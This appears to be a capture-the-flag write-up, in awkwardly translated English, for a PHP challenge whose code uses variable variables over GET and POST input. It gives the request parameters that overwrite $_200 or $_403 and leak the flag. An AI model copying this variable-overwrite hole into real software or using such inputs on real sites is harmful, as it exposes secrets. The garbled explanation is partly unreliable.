topic
<?php
include "flag.php";
$_403 = "Access Denied";
$_200 = "Welcome Admin";
if ($_SERVER["REQUEST_METHOD"] != "POST")
die("BugsBunnyCTF is here :p...");
if ( !isset($_POST["flag"]) )
die($_403);
foreach ($_GET as $key => $value)
$$key = $$value;
foreach ($_POST as $key => $value)
$$key = $value;
if ( $_POST["flag"] !== $flag )
die($_403);
echo "This is your flag : ". $flag . "\n";
die($_200);
analysis
if ($_SERVER["REQUEST_METHOD"] != "POST")
die("BugsBunnyCTF is here :p...");
It must be a POST request method
if ( !isset($_POST["flag"]) )
die($_403);
POST requires a variable named flag of
foreach ($_GET as $key => $value)
$$key = $$value;
foreach ($_POST as $key => $value)
$$key = $value;
$$ variables covering
the first foreach, the value of any variable can impart any variable
second foreach at any given value of the input variable can
if ( $_POST["flag"] !== $flag )
die($_403);
echo "This is your flag : ". $flag . "\n";
die($_200);
$_POST["flag"]
And if $flag
not exactly equal, i.e., when value types, and outputs $_403
if exactly equal, the output $flag
, and$_200
Try the situation got to try POST
Obviously this is not the flag 1
Looking back at the above variables covered, foreach ($_POST as $key => $value)$$key = $value;
when only a POST variable flag value of 1, $$key = $valu
=> $flag = 1
, the variables that might otherwise exist flag is assigned to $ 1, that is true flag is modified to the value of the variable flag Since the first two if, this can not be changed
so require real flag before its value is modified to other variables and can output it
can output only die($_403);
and die($_200);
so the idea is to use a variable to be covered in the flag changed before the true $flag
value coverage $_403
or $_200
and outputs
and can take advantage of variable cover the value of a variable other variables covering only the first place at a foreach
Knowledge Point
$$ variable coverage
solution
$_200
The real flag covering $_200
and output$_200
$_GET['_200']='flag';
$_POST['flag']=1;
foreach ($_GET as $key => $value)
$$key = $$value;
Equivalent $_200=$flag
, it will give the true flag$_200
foreach ($_POST as $key => $value)
$$key = $value;
if ( $_POST["flag"] !== $flag )
die($_403);
$flag
1 is modified, the $_POST['flag']
type and the like equivalent, is not satisfied$_POST["flag"] !== $flag
echo "This is your flag : ". $flag . "\n";
die($_200);
Output $_200
that is true flag output
$_403
The real flag covering $_403
and constructed so that $_403
energy output
$_GET['_403']=flag
&$_GET["_POST['flag']"]=2
$_POST['flag']=1;
foreach ($_GET as $key => $value)
$$key = $$value;
Corresponds $_403=$flag
, to the flag to true $_403
, as well $_POST['flag']=$2
, $2
does not exist, i.e. $_POST['flag']
is empty [actual code should be given]
foreach ($_POST as $key => $value)
$$key = $value;
if ( $_POST["flag"] !== $flag )
die($_403);
$flag
1 is modified, and the $_POST['flag']
ranges to meet the $_POST["flag"] !== $flag
output$_403